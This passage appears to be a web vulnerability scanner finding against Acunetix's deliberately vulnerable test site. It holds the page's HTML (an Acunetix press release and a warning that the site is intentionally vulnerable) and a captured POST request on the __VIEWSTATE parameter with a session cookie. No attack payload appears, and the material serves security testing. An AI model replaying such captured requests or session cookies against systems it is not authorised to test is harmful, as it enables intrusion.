ZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKx7LcVAv6Q/OMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm/BQKK+dPZCQKK+dPZCQKK+cf8AgKK+cf8AgKK+fuTCgKK+fuTCgKK+e+2AwKK+e+2AwKK+YPNDAKK+YPNDAKK+bfgBQKK+bfgBQKK+auHDQKK+auHDQKK+Z/sCwKK+Z/sCwKK+bODAwKK+bODAwK/k//ECQK/k//ECQK/k5ObAQK/k5ObAQK/k4e+CgK/k4e+CgK/k7vVAwK/k7vVAwK/k6/oDAK/k6/oDAK/k8OMBAK/k8OMBAK/k/ejDQK/k/ejDQK/k+vGBgK/k+vGBgK/k9+vAwK/k9+vAwK/k/PCDAK/k/PCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ+AkCkLqZ+AkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X/qqjYsEEZ5ETd0S8=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 466 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads%2fdef.html&id=2 Content-Length: 11097 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 11,097 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgIC